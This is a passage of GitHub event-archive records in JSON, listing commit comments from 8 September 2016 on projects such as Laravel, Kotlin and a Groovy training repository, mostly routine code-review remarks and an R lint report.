{"id":"4532716962","type":"CommitCommentEvent","actor":{"login":"nemesis621"},"repo":{"name":"mogic-le/timetracker"},"payload":{"comment":{"id":18941686,"position":null,"line":null,"path":null,"commit_id":"96401d7430823dde1b7d676b2ec219f56dd45ced","created_at":"2016-09-08T09:03:40Z","updated_at":"2016-09-08T09:03:40Z","body":"Your note was attached in the latest release.\r\nThank you for the hint."}},"created_at":"2016-09-08T09:03:40Z"}
{"id":"4532717350","type":"CommitCommentEvent","actor":{"login":"ConnorVG"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":18941687,"position":64,"line":64,"path":"src/Illuminate/Support/Testing/Fakes/BusFake.php","commit_id":"5deab59e89b85e09b2bd1642e4efe55e933805ca","created_at":"2016-09-08T09:03:42Z","updated_at":"2016-09-08T09:03:42Z","body":"This will never be true?"}},"created_at":"2016-09-08T09:03:42Z"}
{"id":"4532718686","type":"CommitCommentEvent","actor":{"login":"stefan-it"},"repo":{"name":"fsateler/mkosi"},"payload":{"comment":{"id":18941688,"position":6,"line":456,"path":"mkosi","commit_id":"3656ae181c052a5f0b22456d364ed9dc4c40854b","created_at":"2016-09-08T09:03:58Z","updated_at":"2016-09-08T09:03:58Z","body":"@fsateler For Debian Jessie that works now :+1: \r\n\r\nBut for Ubuntu none of them (`vivid`, `wily` and `xenial` or the latest `yakkety`) provides `usrmerge`.\r\n\r\nSo we probably should limit this to Debian and `sid` and `stretch`. So we can use a kind of \"whitelist\" for that option, instead of a \"blacklist\". What do you think?"}},"created_at":"2016-09-08T09:03:58Z"}
{"id":"4532718762","type":"CommitCommentEvent","actor":{"login":"ConnorVG"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":18941689,"position":64,"line":64,"path":"src/Illuminate/Support/Testing/Fakes/EventFake.php","commit_id":"5deab59e89b85e09b2bd1642e4efe55e933805ca","created_at":"2016-09-08T09:03:58Z","updated_at":"2016-09-08T09:03:58Z","body":"This will also never be true?"}},"created_at":"2016-09-08T09:03:58Z"}
{"id":"4532719482","type":"CommitCommentEvent","actor":{"login":"kms-nhien-truong"},"repo":{"name":"thingan/KMS-Training"},"payload":{"comment":{"id":18941693,"position":34,"line":34,"path":"src/test/java/appModule/CheckoutProduct.groovy","commit_id":"a0a8cce3a79957d8e9973e1bab6fca8c52d04e3e","created_at":"2016-09-08T09:04:09Z","updated_at":"2016-09-08T09:04:09Z","body":"should leverage Groovy features:\r\nusing def keyword\r\nomit parentheses "}},"created_at":"2016-09-08T09:04:09Z"}
{"id":"4532719812","type":"CommitCommentEvent","actor":{"login":"ConnorVG"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":18941694,"position":123,"line":123,"path":"src/Illuminate/Support/Testing/Fakes/MailFake.php","commit_id":"5deab59e89b85e09b2bd1642e4efe55e933805ca","created_at":"2016-09-08T09:04:12Z","updated_at":"2016-09-08T09:04:12Z","body":"This will also never be true? Again."}},"created_at":"2016-09-08T09:04:12Z"}
{"id":"4532721247","type":"CommitCommentEvent","actor":{"login":"sheenobu"},"repo":{"name":"sheenobu/nixos"},"payload":{"comment":{"id":18941701,"position":null,"line":null,"path":null,"commit_id":"cbc179b0c100ed876a7cca9d8ad858d5344f4edc","created_at":"2016-09-08T09:04:28Z","updated_at":"2016-09-08T09:04:28Z","body":"@jgeerds I'll create a bug / feature request on github. Vote on it!"}},"created_at":"2016-09-08T09:04:28Z"}
{"id":"4532722261","type":"CommitCommentEvent","actor":{"login":"ConnorVG"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":18941706,"position":71,"line":71,"path":"src/Illuminate/Support/Testing/Fakes/NotificationFake.php","commit_id":"5deab59e89b85e09b2bd1642e4efe55e933805ca","created_at":"2016-09-08T09:04:40Z","updated_at":"2016-09-08T09:04:40Z","body":"Bit inconsistent here but still will always be false."}},"created_at":"2016-09-08T09:04:40Z"}
{"id":"4532723408","type":"CommitCommentEvent","actor":{"login":"nemesis621"},"repo":{"name":"mogic-le/timetracker"},"payload":{"comment":{"id":18941707,"position":138,"line":105,"path":"src/Netresearch/TimeTrackerBundle/Helper/JiraUserApi.php","commit_id":"96401d7430823dde1b7d676b2ec219f56dd45ced","created_at":"2016-09-08T09:04:54Z","updated_at":"2016-09-08T09:04:54Z","body":"@CybotTM Your note was attached in the latest release.\r\nThank you for the hint."}},"created_at":"2016-09-08T09:04:54Z"}
{"id":"4532723524","type":"CommitCommentEvent","actor":{"login":"ConnorVG"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":18941708,"position":87,"line":87,"path":"src/Illuminate/Support/Testing/Fakes/QueueFake.php","commit_id":"5deab59e89b85e09b2bd1642e4efe55e933805ca","created_at":"2016-09-08T09:04:55Z","updated_at":"2016-09-08T09:04:55Z","body":"Again always false."}},"created_at":"2016-09-08T09:04:55Z"}
{"id":"4532723889","type":"CommitCommentEvent","actor":{"login":"ditingfujun"},"repo":{"name":"highsea/Hosts"},"payload":{"comment":{"id":18941709,"position":null,"line":null,"path":null,"commit_id":"3fa732acfa358de123cb00ac878b7184737870de","created_at":"2016-09-08T09:05:00Z","updated_at":"2016-09-08T09:05:00Z","body":"i need it"}},"created_at":"2016-09-08T09:05:00Z"}
{"id":"4532724145","type":"CommitCommentEvent","actor":{"login":"father-mande"},"repo":{"name":"father-mande/qpkg_kodi17"},"payload":{"comment":{"id":18941711,"position":null,"line":null,"path":null,"commit_id":"d7cd008847422152a35a58ff0608fb52fdc99173","created_at":"2016-09-08T09:05:03Z","updated_at":"2016-09-08T09:05:03Z","body":"HD_Station specific file (QTV Desktop manager)"}},"created_at":"2016-09-08T09:05:03Z"}
{"id":"4532724202","type":"CommitCommentEvent","actor":{"login":"kms-nhien-truong"},"repo":{"name":"thingan/KMS-Training"},"payload":{"comment":{"id":18941712,"position":42,"line":42,"path":"src/test/java/appModule/CheckoutProduct.groovy","commit_id":"a0a8cce3a79957d8e9973e1bab6fca8c52d04e3e","created_at":"2016-09-08T09:05:04Z","updated_at":"2016-09-08T09:05:04Z","body":"the waiting time should be defined somewhere else in form of configurations"}},"created_at":"2016-09-08T09:05:04Z"}
{"id":"4532724803","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18941715,"position":12,"line":47,"path":"core/descriptor.loader.java/src/org/jetbrains/kotlin/load/java/lazy/descriptors/LazyJavaPackageScope.kt","commit_id":"430084e8419cd23adca32a2b8976ae054c2824d0","created_at":"2016-09-08T09:05:12Z","updated_at":"2016-09-08T09:05:12Z","body":"Is there a need to store it, especially in the lazy value? The FQ name is already computed and is stored in `LazyJavaPackageFragment`. Maybe change to just\r\n```\r\nprivate val packageFqName: FqName get() = ownerDescriptor.fqName\r\n```\r\n"}},"created_at":"2016-09-08T09:05:12Z"}
{"id":"4532729758","type":"CommitCommentEvent","actor":{"login":"kms-nhien-truong"},"repo":{"name":"thingan/KMS-Training"},"payload":{"comment":{"id":18941729,"position":44,"line":44,"path":"src/test/java/appModule/CheckoutProduct.groovy","commit_id":"a0a8cce3a79957d8e9973e1bab6fca8c52d04e3e","created_at":"2016-09-08T09:06:11Z","updated_at":"2016-09-08T09:06:11Z","body":"I am sure about the logic, however the code snippet looks not so nice.\r\n"}},"created_at":"2016-09-08T09:06:11Z"}
{"id":"4532732226","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18941735,"position":31,"line":65,"path":"core/descriptor.loader.java/src/org/jetbrains/kotlin/load/java/lazy/descriptors/LazyJavaPackageScope.kt","commit_id":"430084e8419cd23adca32a2b8976ae054c2824d0","created_at":"2016-09-08T09:06:38Z","updated_at":"2016-09-08T09:06:38Z","body":"Maybe this would be more readable:\r\n```\r\nval classId = kotlinBinaryClass?.classId\r\nif (classId != null && (classId.isNestedClass || classId.isLocal)) ...\r\n```\r\n"}},"created_at":"2016-09-08T09:06:38Z"}
{"id":"4532735518","type":"CommitCommentEvent","actor":{"login":"kms-nhien-truong"},"repo":{"name":"thingan/KMS-Training"},"payload":{"comment":{"id":18941740,"position":56,"line":56,"path":"src/test/java/appModule/CheckoutProduct.groovy","commit_id":"a0a8cce3a79957d8e9973e1bab6fca8c52d04e3e","created_at":"2016-09-08T09:07:20Z","updated_at":"2016-09-08T09:07:20Z","body":"The statement is duplicated several times. Should introduce a new variable for it. and reuse later."}},"created_at":"2016-09-08T09:07:20Z"}
{"id":"4532738835","type":"CommitCommentEvent","actor":{"login":"amalshehu"},"repo":{"name":"amalshehu/exercism-python"},"payload":{"comment":{"id":18941745,"position":null,"line":null,"path":null,"commit_id":"822a14dd313c643a057c161912d7b2f01377c839","created_at":"2016-09-08T09:07:59Z","updated_at":"2016-09-08T09:07:59Z","body":"OK, I will follow it."}},"created_at":"2016-09-08T09:07:59Z"}
{"id":"4532739943","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18941748,"position":31,"line":65,"path":"core/descriptor.loader.java/src/org/jetbrains/kotlin/load/java/lazy/descriptors/LazyJavaPackageScope.kt","commit_id":"430084e8419cd23adca32a2b8976ae054c2824d0","created_at":"2016-09-08T09:08:12Z","updated_at":"2016-09-08T09:08:12Z","body":"Also I think a comment would be nice here, on how is it possible that a nested class is found for a top level search request."}},"created_at":"2016-09-08T09:08:12Z"}
{"id":"4532740434","type":"CommitCommentEvent","actor":{"login":"michaloo"},"repo":{"name":"hull-ships/hull-hubspot"},"payload":{"comment":{"id":18941752,"position":14,"line":12,"path":"server/app/web-app.js","commit_id":"0ccc8844e1e5fef3d031f50bf7d7fca917d0e25c","created_at":"2016-09-08T09:08:18Z","updated_at":"2016-09-08T09:08:18Z","body":"It should be handled here - I will verify why it doesn't work:\r\nhttps://github.com/hull-ships/hull-hubspot/blob/master/server/router/web-static-router.js#L10"}},"created_at":"2016-09-08T09:08:18Z"}
{"id":"4532742666","type":"CommitCommentEvent","actor":{"login":"pyrsmk"},"repo":{"name":"pyrsmk/qwest"},"payload":{"comment":{"id":18941754,"position":7,"line":5,"path":"src/qwest.js","commit_id":"45376855c8bd55d95f1220ad99d65d1c600fb418","created_at":"2016-09-08T09:08:45Z","updated_at":"2016-09-08T09:08:45Z","body":"What is your environment? NPM?"}},"created_at":"2016-09-08T09:08:45Z"}
{"id":"4532744168","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18941757,"position":45,"line":91,"path":"core/descriptor.loader.java/src/org/jetbrains/kotlin/load/java/lazy/descriptors/LazyJavaPackageScope.kt","commit_id":"430084e8419cd23adca32a2b8976ae054c2824d0","created_at":"2016-09-08T09:09:04Z","updated_at":"2016-09-08T09:09:04Z","body":"Why is this needed? (A comment would be useful, if it still is.)"}},"created_at":"2016-09-08T09:09:04Z"}
{"id":"4532744721","type":"CommitCommentEvent","actor":{"login":"kms-nhien-truong"},"repo":{"name":"thingan/KMS-Training"},"payload":{"comment":{"id":18941758,"position":74,"line":74,"path":"src/test/java/appModule/CheckoutProduct.groovy","commit_id":"a0a8cce3a79957d8e9973e1bab6fca8c52d04e3e","created_at":"2016-09-08T09:09:11Z","updated_at":"2016-09-08T09:09:11Z","body":"Consider to optimize the following statement on coding convention\r\n```\r\ndef select  = new Select( Product_Page.txt_BillingCountry(driver) )\r\n```"}},"created_at":"2016-09-08T09:09:11Z"}
{"id":"4532744735","type":"CommitCommentEvent","actor":{"login":"burningice2866"},"repo":{"name":"Orckestra/C1-CMS"},"payload":{"comment":{"id":18941759,"position":106,"line":139,"path":"Composite/C1Console/Trees/GenericAddDataActionNode.cs","commit_id":"b1f70368622c89bbb4d53bdc744f12856befa46c","created_at":"2016-09-08T09:09:11Z","updated_at":"2016-09-08T09:09:11Z","body":"@napernik In that case, the line should have its own Try-Catch, since the Catch now throws a message saying that the Path to the file is invalid, not that the content of the file is bad.\r\n\r\nAddValidationError(\"TreeValidationError.GenericAddDataAction.BadMarkupPath\", this.CustomFormMarkupPath);\r\n\r\nhttps://github.com/Orckestra/C1-CMS/blob/312d7c231657181f6bf8a1111bc64594591f0a53/Website/Composite/localization/Composite.C1Console.Trees.en-us.xml#L62"}},"created_at":"2016-09-08T09:09:11Z"}
{"id":"4532747213","type":"CommitCommentEvent","actor":{"login":"caohhung"},"repo":{"name":"scattm/DanceCat"},"payload":{"comment":{"id":18941766,"position":10,"line":91,"path":"tests/test_dance_cat_helpers.py","commit_id":"41444987e151afa7885c1117534bff8103097fe8","created_at":"2016-09-08T09:09:38Z","updated_at":"2016-09-08T09:09:38Z","body":"Oh My God"}},"created_at":"2016-09-08T09:09:38Z"}
{"id":"4532748443","type":"CommitCommentEvent","actor":{"login":"k-okada"},"repo":{"name":"ros-perception/opencv_apps"},"payload":{"comment":{"id":18941770,"position":7,"line":137,"path":"src/nodelet/lk_flow_nodelet.cpp","commit_id":"3ab28cf0bc07d4ce53537650bfd9cb59ab3be07f","created_at":"2016-09-08T09:09:54Z","updated_at":"2016-09-08T09:09:54Z","body":"Can we remove this line if we write\r\n```\r\ncv::Mat image = cv_bridge::toCvShare(msg, sensor_msgs::image_encodings::BGR8)->image;\r\n```"}},"created_at":"2016-09-08T09:09:54Z"}
{"id":"4532749326","type":"CommitCommentEvent","actor":{"login":"kms-nhien-truong"},"repo":{"name":"thingan/KMS-Training"},"payload":{"comment":{"id":18941772,"position":81,"line":81,"path":"src/test/java/appModule/CheckoutProduct.groovy","commit_id":"a0a8cce3a79957d8e9973e1bab6fca8c52d04e3e","created_at":"2016-09-08T09:10:04Z","updated_at":"2016-09-08T09:10:04Z","body":"This way seems not good to define a web element. a web element should be introduced before action."}},"created_at":"2016-09-08T09:10:04Z"}
{"id":"4532749651","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18941773,"position":null,"line":null,"path":null,"commit_id":"430084e8419cd23adca32a2b8976ae054c2824d0","created_at":"2016-09-08T09:10:09Z","updated_at":"2016-09-08T09:10:09Z","body":"Let's maybe add a test, see `CompileKotlinAgainstCustomBinariesTest`"}},"created_at":"2016-09-08T09:10:09Z"}
{"id":"4532750065","type":"CommitCommentEvent","actor":{"login":"ifokkema"},"repo":{"name":"LOVDnl/LOVD3"},"payload":{"comment":{"id":18941775,"position":26,"line":117,"path":"src/class/object_custom_viewlists.php","commit_id":"c4175ac18f6ee9d50887360b81da84a80e47408b","created_at":"2016-09-08T09:10:15Z","updated_at":"2016-09-08T09:10:15Z","body":"We don't have tests for this, I'm afraid... It breaks part of the legend [here](https://github.com/LOVDnl/LOVD3/blob/feat/f_n_r_test/src/class/objects.php#L1984-L1992). Also, while it indeed simplifies the code you point to, it complicates things [here](https://github.com/LOVDnl/LOVD3/blob/feat/f_n_r_test/src/class/object_custom_viewlists.php#L696-L700) and [here](https://github.com/LOVDnl/LOVD3/blob/feat/f_n_r_test/src/class/object_custom_viewlists.php#L755-L768) with extra loops that were before not necessary. Perhaps in other places as well.\r\n\r\nI propose to create a function that returns the subset of columns you want (perhaps cached if we worry about the processing time, albeit it can't be worse than `master` now), that we can use when it is to our advantage, while the \"old\" method will continue to work when that is more efficient."}},"created_at":"2016-09-08T09:10:15Z"}
{"id":"4532751517","type":"CommitCommentEvent","actor":{"login":"sheerun"},"repo":{"name":"sheerun/knex-migrate"},"payload":{"comment":{"id":18941779,"position":null,"line":null,"path":null,"commit_id":"d2b82d31fdbe2f2435eb132646113d354fb91388","created_at":"2016-09-08T09:10:31Z","updated_at":"2016-09-08T09:10:31Z","body":"Both CLI and storage wasn't sufficient and it was more efficient to just copy them and modify instead going though pull requests to your storage implementation (for example while you use custom table structure, I use the same as defualt knex migrations tool, your storage isn't compatible).\r\n\r\nThe same for CLI, For example I didn't need \"history\" feature, but just list of pending and executed migrations (among others because original knex migrations table wodnt't support it). I wish I could leave your commit history, but this repo isn't simple fork of one of your projects."}},"created_at":"2016-09-08T09:10:31Z"}
{"id":"4532754015","type":"CommitCommentEvent","actor":{"login":"Feb12"},"repo":{"name":"Feb12/Test"},"payload":{"comment":{"id":18941787,"position":null,"line":null,"path":null,"commit_id":"8b7b0200e52a85f052922e49d06c1652b132b977","created_at":"2016-09-08T09:11:02Z","updated_at":"2016-09-08T09:11:02Z","body":"First test code from my end on September 8."}},"created_at":"2016-09-08T09:11:02Z"}
{"id":"4532755186","type":"CommitCommentEvent","actor":{"login":"Janepenn"},"repo":{"name":"Janepenn/Emulator_Control"},"payload":{"comment":{"id":18941789,"position":null,"line":null,"path":null,"commit_id":"f0983c2e8b82651261ad5f903946ac714bb9394f","created_at":"2016-09-08T09:11:18Z","updated_at":"2016-09-08T09:11:18Z","body":"123"}},"created_at":"2016-09-08T09:11:18Z"}
{"id":"4532755493","type":"CommitCommentEvent","actor":{"login":"Tarpsvo"},"repo":{"name":"kveskime/sumochip-1"},"payload":{"comment":{"id":18941790,"position":null,"line":null,"path":null,"commit_id":"7cde06a53c4bdf78ac396179bb64551db16c9025","created_at":"2016-09-08T09:11:22Z","updated_at":"2016-09-08T09:11:22Z","body":"Revolutionary changes."}},"created_at":"2016-09-08T09:11:22Z"}
{"id":"4532757180","type":"CommitCommentEvent","actor":{"login":"IgorZiegler"},"repo":{"name":"hwdtech/smartforms"},"payload":{"comment":{"id":18941796,"position":4,"line":5,"path":".gitignore","commit_id":"a00b1af56eb919b8848d77d6065e16d4b0adc76f","created_at":"2016-09-08T09:11:39Z","updated_at":"2016-09-08T09:11:39Z","body":"REMOVE IT!!!!!"}},"created_at":"2016-09-08T09:11:39Z"}
{"id":"4532757987","type":"CommitCommentEvent","actor":{"login":"caohhung"},"repo":{"name":"scattm/DanceCat"},"payload":{"comment":{"id":18941798,"position":40,"line":199,"path":"tests/test_dance_cat_helpers.py","commit_id":"41444987e151afa7885c1117534bff8103097fe8","created_at":"2016-09-08T09:11:49Z","updated_at":"2016-09-08T09:11:49Z","body":"for email in ['email_1', 'email_2',....]:\r\n    assert not Helpers.is_valid_format_email(email)\r\nDo the same with valid cases"}},"created_at":"2016-09-08T09:11:49Z"}
{"id":"4532758879","type":"CommitCommentEvent","actor":{"login":"javelinjs"},"repo":{"name":"dmlc/mxnet"},"payload":{"comment":{"id":18941799,"position":4,"line":111,"path":"tests/travis/run_test.sh","commit_id":"3e15f6288609419e7bf5aa3119b1212eaeeec8be","created_at":"2016-09-08T09:11:59Z","updated_at":"2016-09-08T09:11:59Z","body":"@pluskid Did I remove the julia test by mistake?"}},"created_at":"2016-09-08T09:11:59Z"}
{"id":"4532763662","type":"CommitCommentEvent","actor":{"login":"kms-nhien-truong"},"repo":{"name":"thingan/KMS-Training"},"payload":{"comment":{"id":18941810,"position":34,"line":34,"path":"src/test/java/appModule/SignIn_Action.groovy","commit_id":"a0a8cce3a79957d8e9973e1bab6fca8c52d04e3e","created_at":"2016-09-08T09:12:57Z","updated_at":"2016-09-08T09:12:57Z","body":"should combine to\r\n```\r\ndef credentialText = LogIn_Page.txt_invalidCredential(driver).getText()\r\n```"}},"created_at":"2016-09-08T09:12:57Z"}
{"id":"4532767079","type":"CommitCommentEvent","actor":{"login":"changhaozhe"},"repo":{"name":"changhaozhe/Chang_Repository"},"payload":{"comment":{"id":18941817,"position":2,"line":2,"path":"README.md","commit_id":"aad297785b147ef1f07a894e2b43295531c95f45","created_at":"2016-09-08T09:13:38Z","updated_at":"2016-09-08T09:13:38Z","body":"haha"}},"created_at":"2016-09-08T09:13:38Z"}
{"id":"4532767432","type":"CommitCommentEvent","actor":{"login":"757350134"},"repo":{"name":"757350134/java"},"payload":{"comment":{"id":18941818,"position":null,"line":null,"path":null,"commit_id":"4783bd24e811793f760f0c26f22abf9b4e645e10","created_at":"2016-09-08T09:13:42Z","updated_at":"2016-09-08T09:13:42Z","body":"dasdas"}},"created_at":"2016-09-08T09:13:42Z"}
{"id":"4532768426","type":"CommitCommentEvent","actor":{"login":"JijoBose"},"repo":{"name":"jimweirich/wyriki"},"payload":{"comment":{"id":18941819,"position":null,"line":null,"path":null,"commit_id":"d28fac7f18aeacb00d8ad3460a0a5a901617c2d4","created_at":"2016-09-08T09:13:53Z","updated_at":"2016-09-08T09:13:53Z","body":"You may have gone, but your creations live forever.\r\n\r\nMiss you.\r\n:heart:  :rose: :computer: :pray: "}},"created_at":"2016-09-08T09:13:53Z"}
{"id":"4532770517","type":"CommitCommentEvent","actor":{"login":"kms-nhien-truong"},"repo":{"name":"thingan/KMS-Training"},"payload":{"comment":{"id":18941825,"position":27,"line":27,"path":"src/test/java/automationFramework/Module_TC.groovy","commit_id":"a0a8cce3a79957d8e9973e1bab6fca8c52d04e3e","created_at":"2016-09-08T09:14:16Z","updated_at":"2016-09-08T09:14:16Z","body":"The tests should use a testing framework like JUnit or TestNG rather than put in to a main method.\r\nthe browser should be parameterized also."}},"created_at":"2016-09-08T09:14:16Z"}
{"id":"4532771951","type":"CommitCommentEvent","actor":{"login":"k-okada"},"repo":{"name":"ros-perception/opencv_apps"},"payload":{"comment":{"id":18941827,"position":7,"line":137,"path":"src/nodelet/lk_flow_nodelet.cpp","commit_id":"3ab28cf0bc07d4ce53537650bfd9cb59ab3be07f","created_at":"2016-09-08T09:14:31Z","updated_at":"2016-09-08T09:14:31Z","body":"same for https://github.com/ros-perception/opencv_apps/pull/29/files#diff-56e95f980d60d41f01dd7d5c633f9f6dR173"}},"created_at":"2016-09-08T09:14:31Z"}
{"id":"4532772308","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18941828,"position":24,"line":71,"path":"core/deserialization/src/org/jetbrains/kotlin/serialization/deserialization/descriptors/DeserializedMemberScope.kt","commit_id":"f6c9fcfdaae9c515dce4fb0437b56c23ccf56e0f","created_at":"2016-09-08T09:14:35Z","updated_at":"2016-09-08T09:14:35Z","body":"Probably this lazy value is not needed, `keySet` is itself lazy in `AbstractMap`"}},"created_at":"2016-09-08T09:14:35Z"}
{"id":"4532775269","type":"CommitCommentEvent","actor":{"login":"guypod"},"repo":{"name":"igrigorik/ga-beacon"},"payload":{"comment":{"id":18941833,"position":null,"line":null,"path":null,"commit_id":"6acd8627bb7be36f24f5516e9873c92719a50e55","created_at":"2016-09-08T09:15:12Z","updated_at":"2016-09-08T09:15:12Z","body":"@igrigorik per the guidance GitHub gave for badges, you can still get these beacons to not cache if you add `Cache-Control: no-cache` and `ETag` headers (see  https://github.com/github/markup/issues/224#issuecomment-33454537). \r\n\r\nWouldn't that work for this beacon too?\r\n\r\n"}},"created_at":"2016-09-08T09:15:12Z"}
{"id":"4532775909","type":"CommitCommentEvent","actor":{"login":"kms-nhien-truong"},"repo":{"name":"thingan/KMS-Training"},"payload":{"comment":{"id":18941835,"position":26,"line":26,"path":"src/test/java/automationFramework/TestNG_Framework.groovy","commit_id":"a0a8cce3a79957d8e9973e1bab6fca8c52d04e3e","created_at":"2016-09-08T09:15:18Z","updated_at":"2016-09-08T09:15:18Z","body":"I am not sure why we have 2 drivers here?"}},"created_at":"2016-09-08T09:15:18Z"}
{"id":"4532778532","type":"CommitCommentEvent","actor":{"login":"Pythonyte"},"repo":{"name":"midNight-jam/PythonJam"},"payload":{"comment":{"id":18941842,"position":null,"line":null,"path":null,"commit_id":"ce195314965b480f8695703c398d389c86d556cc","created_at":"2016-09-08T09:15:49Z","updated_at":"2016-09-08T09:15:49Z","body":"[5, 6, 3, 2, 7, 12]\r\nOutput required is :+1: \r\n5 -- 6\r\n2 -- 7\r\n3 -- 7\r\n6 -- 7\r\n7 -- 12\r\n12 -- -1"}},"created_at":"2016-09-08T09:15:49Z"}
{"id":"4532783022","type":"CommitCommentEvent","actor":{"login":"TheOfficialFloW"},"repo":{"name":"TheOfficialFloW/VitaShell"},"payload":{"comment":{"id":18941854,"position":null,"line":null,"path":null,"commit_id":"bf6c200770ed539493b41304ba86f0fe36ea73d1","created_at":"2016-09-08T09:16:40Z","updated_at":"2016-09-08T09:16:40Z","body":"With more and more text editor features, maybe it's really better to have a context menu, what do you think? Maybe add mark line feature too"}},"created_at":"2016-09-08T09:16:40Z"}
{"id":"4532783781","type":"CommitCommentEvent","actor":{"login":"yuchi"},"repo":{"name":"smclab/liferay-plugins"},"payload":{"comment":{"id":18941856,"position":18,"line":33,"path":"portlets/privacy-portlet/docroot/display/view.jsp","commit_id":"c94ab4cd3ca5f58cc05be58a0e0d0c1ec89c7894","created_at":"2016-09-08T09:16:49Z","updated_at":"2016-09-08T09:16:49Z","body":"There’s a little issue here. If you expose a Language key you can, more or less, skip escaping because you wrote the text in the _Language.properties_ file.\r\n\r\nThe title of a Web Content is obviously not hard coded in the source files.\r\nAlso using it as a translation key doesn’t make so much sense.\r\n\r\nremove the use of the taglib and expose the Web Content title as the `title` attribute, correctly escaped. IMHO.\r\n\r\n/cc @ComLuke"}},"created_at":"2016-09-08T09:16:49Z"}
{"id":"4532785056","type":"CommitCommentEvent","actor":{"login":"ethicalhack3r"},"repo":{"name":"wpscanteam/wpscan"},"payload":{"comment":{"id":18941858,"position":null,"line":null,"path":null,"commit_id":"f3cc35bd74cf5d91774fd0bcafda8e6f8d849c98","created_at":"2016-09-08T09:17:03Z","updated_at":"2016-09-08T09:17:03Z","body":"Good point! Done!"}},"created_at":"2016-09-08T09:17:03Z"}
{"id":"4532786050","type":"CommitCommentEvent","actor":{"login":"yuchi"},"repo":{"name":"smclab/liferay-plugins"},"payload":{"comment":{"id":18941859,"position":30,"line":45,"path":"portlets/privacy-portlet/docroot/display/view.jsp","commit_id":"c94ab4cd3ca5f58cc05be58a0e0d0c1ec89c7894","created_at":"2016-09-08T09:17:14Z","updated_at":"2016-09-08T09:17:14Z","body":"Epic! :+1:"}},"created_at":"2016-09-08T09:17:14Z"}
{"id":"4532786712","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/Cer2016"},"payload":{"comment":{"id":18941861,"position":null,"line":null,"path":null,"commit_id":"b251812aa977e466e5b31de04e2af7911fa5e61a","created_at":"2016-09-08T09:17:21Z","updated_at":"2016-09-08T09:17:21Z","body":"[R/are_beast_replicates_from_same_distribution.R:5:1:](https://github.com/richelbilderbeek/Cer2016/blob/b251812aa977e466e5b31de04e2af7911fa5e61a/R/are_beast_replicates_from_same_distribution.R#L5) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​are_beast_replicates_from_same_distribution <- function(df) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/are_beast_replicates_from_same_distribution.R:27:33:](https://github.com/richelbilderbeek/Cer2016/blob/b251812aa977e466e5b31de04e2af7911fa5e61a/R/are_beast_replicates_from_same_distribution.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​    df <- plyr::rename(df, c(\"1\"=\"A\", \"2\"=\"B\"))\n                               ~^~\n```\n[R/are_beast_replicates_from_same_distribution.R:27:42:](https://github.com/richelbilderbeek/Cer2016/blob/b251812aa977e466e5b31de04e2af7911fa5e61a/R/are_beast_replicates_from_same_distribution.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​    df <- plyr::rename(df, c(\"1\"=\"A\", \"2\"=\"B\"))\n                                        ~^~\n```\n[R/are_from_same_distribution.R:9:1:](https://github.com/richelbilderbeek/Cer2016/blob/b251812aa977e466e5b31de04e2af7911fa5e61a/R/are_from_same_distribution.R#L9) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​{\n^\n```\n[R/are_from_same_distribution.R:11:6:](https://github.com/richelbilderbeek/Cer2016/blob/b251812aa977e466e5b31de04e2af7911fa5e61a/R/are_from_same_distribution.R#L11) *style:* **Commented code should be removed.**\n```r\n​    #message(\"Need at least one value in the first distribution\")\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/are_from_same_distribution.R:16:6:](https://github.com/richelbilderbeek/Cer2016/blob/b251812aa977e466e5b31de04e2af7911fa5e61a/R/are_from_same_distribution.R#L16) *style:* **Commented code should be removed.**\n```r\n​    #message(\"Need at least one value in the second distribution\")\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-are_beast_replicates_from_same_distribution.R:8:9:](https://github.com/richelbilderbeek/Cer2016/blob/b251812aa977e466e5b31de04e2af7911fa5e61a/tests/testthat/test-are_beast_replicates_from_same_distribution.R#L8) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​  df <- are_beast_replicates_from_same_distribution(nltt_stats)\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-are_beast_replicates_from_same_distribution.R:24:18:](https://github.com/richelbilderbeek/Cer2016/blob/b251812aa977e466e5b31de04e2af7911fa5e61a/tests/testthat/test-are_beast_replicates_from_same_distribution.R#L24) *style:* **Commas should always have a space after.**\n```r\n​    pi = rep(c(1,2), each = 100),\n                 ^\n```\n[tests/testthat/test-are_beast_replicates_from_same_distribution.R:28:9:](https://github.com/richelbilderbeek/Cer2016/blob/b251812aa977e466e5b31de04e2af7911fa5e61a/tests/testthat/test-are_beast_replicates_from_same_distribution.R#L28) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​  df <- are_beast_replicates_from_same_distribution(nltt_stats)\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-are_beast_replicates_from_same_distribution.R:42:18:](https://github.com/richelbilderbeek/Cer2016/blob/b251812aa977e466e5b31de04e2af7911fa5e61a/tests/testthat/test-are_beast_replicates_from_same_distribution.R#L42) 